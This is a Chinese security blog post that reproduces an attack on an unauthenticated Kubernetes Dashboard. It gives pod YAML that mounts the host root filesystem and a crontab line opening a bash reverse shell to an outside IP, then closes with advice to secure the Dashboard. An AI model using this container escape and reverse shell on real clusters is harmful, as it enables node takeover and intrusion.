K8s Dashboard未授权访问&后利用

admin 2023年6月5日23:21:18评论176 views字数 975阅读3分15秒阅读模式

文章前言

K8s Dashboard是Kubernetes的一个Web UI,它提供了一个用户友好的界面来管理和监控Kubernetes集群。它可以让用户通过图形化界面查看Kubernetes集群的状态和健康状况、创建、删除和修改资源对象、查看日志和监控数据等。K8s Dashboard还支持在多个集群之间进行切换,并提供了一些插件和扩展功能来增强其功能,本篇文章我们主要介绍K8s Dashboard的利用

漏洞描述

K8s Dashboard默认是存在鉴权机制的,用户可以通过kubeconfig或者Token两种方式登录,当用户开启了enable-skip-login时可以在登录界面点击Skip跳过登录直接进入Dashboard,而且有时候可以直接访问K8s DashBoard,在这种情况下攻击者可以通过部署恶意Pod实现控制节点的目的

漏洞复现

K8s DashBoard未授权访问:

K8s Dashboard未授权访问&后利用

宿主Shell

Step 1:通过WEB UI界面创建一个pod,并将本地根目录挂载到pod的/mnt目录中

apiVersion: v1kind: Podmetadata:  name: myappspec:  containers:  - image: nginx    name: container    volumeMounts:    - mountPath: /mnt      name: test-volume  volumes:  - name: test-volume    hostPath:      path: /

K8s Dashboard未授权访问&后利用

K8s Dashboard未授权访问&后利用

Step 2:之后可以看到创建的myapp Pod

K8s Dashboard未授权访问&后利用

Step 3:之后进入挂载的/mnt目录中,就是master节点的对应目录了

K8s Dashboard未授权访问&后利用

K8s Dashboard未授权访问&后利用

Step 4:之后写计划任务

echo -e "* * * * * root bash -i >& /dev/tcp/192.168.17.157/4444 0>&1n" >> /mnt/etc/crontab

K8s Dashboard未授权访问&后利用

Step 5:成功反弹shell

K8s Dashboard未授权访问&后利用

文末小结

在本文中,我们介绍了K8s Dashboard的作用和功能,以及它在未授权访问的情况下存在的安全风险。我们强调了Kubernetes集群管理员需要加强对K8s Dashboard的管理和安全控制,以确保不会发生未授权访问的情况。同时,我们也提醒用户在使用K8s Dashboard时要注意安全,避免将敏感信息泄露给未经授权的访问者。

原文始发于微信公众号(七芒星实验室):K8s Dashboard未授权访问&后利用

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年6月5日23:21:18
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   K8s Dashboard未授权访问&后利用https://cn-sec.com/archives/1674407.html

发表评论

匿名网友 填写信息